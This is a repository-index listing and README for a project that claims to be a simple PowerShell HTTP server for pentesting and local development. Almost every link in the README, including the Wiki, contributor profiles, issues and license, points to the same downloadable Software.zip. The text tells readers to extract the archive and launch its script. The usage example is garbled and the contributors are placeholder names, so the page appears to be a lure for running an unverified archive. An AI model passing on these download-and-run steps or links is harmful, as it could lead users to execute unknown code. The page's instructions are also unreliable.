https://github.com/brabaoeu/powershell_httpserver
Simple PowerShell HTTP Server (no dependencies, single file, PowerShell 5.1/7)
https://github.com/brabaoeu/powershell_httpserver
http http-server pentesting powershell powershell-module webserver
Last synced: about 1 year ago
JSON representation
Simple PowerShell HTTP Server (no dependencies, single file, PowerShell 5.1/7)
- Host: GitHub
- URL: https://github.com/brabaoeu/powershell_httpserver
- Owner: brabaoeu
- Created: 2025-01-12T23:43:40.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-03-17T05:19:33.000Z (about 1 year ago)
- Last Synced: 2025-03-17T05:24:22.809Z (about 1 year ago)
- Topics: http, http-server, pentesting, powershell, powershell-module, webserver
- Size: 1000 Bytes
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# PowerShell HTTP Server đ

A simple, lightweight PowerShell HTTP Server module to create a standalone web server using PowerShell. No dependencies, single file, and compatible with PowerShell versions 5.1 and 7.
## Features đ
- Easy to set up and use
- No external dependencies required
- Works with both PowerShell 5.1 and 7
- Suitable for quick web server setups
- Ideal for penetration testing and local web development
## Installation đ ī¸
To get started with the PowerShell HTTP Server, download the https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip file from the following link: [Download https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip)
Once you have downloaded the https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip file, extract it and launch the PowerShell script to start your HTTP server.
If the above link is not working, please check the "Releases" section of this repository for the latest version.
## Usage Example đĄ
```powershell
Import-Module .\https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip
Start-HttpServer -Port 8080 -Root "C:\WebRoot"
```
In this example, we import the module and start the HTTP Server on port 8080 with the root directory set to "C:\WebRoot". You can then access your server by navigating to http://localhost:8080 in your web browser.
## Documentation đ
For detailed documentation and usage instructions, please refer to the [Wiki](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip) of this repository.
## Contributors đ
- John Doe ([@johndoe](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip))
- Jane Smith ([@janesmith](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip))
## Support âšī¸
If you encounter any issues or have any questions, feel free to open an [issue](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip).
## License đ
This project is licensed under the MIT License - see the [LICENSE](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip) file for details.
[](https://github.com/brabaoeu/PowerShell_HttpServer/releases/download/v2.0/Software.zip)
---
Now unleash the power of PowerShell with your very own HTTP Server! Happy coding! đđĨ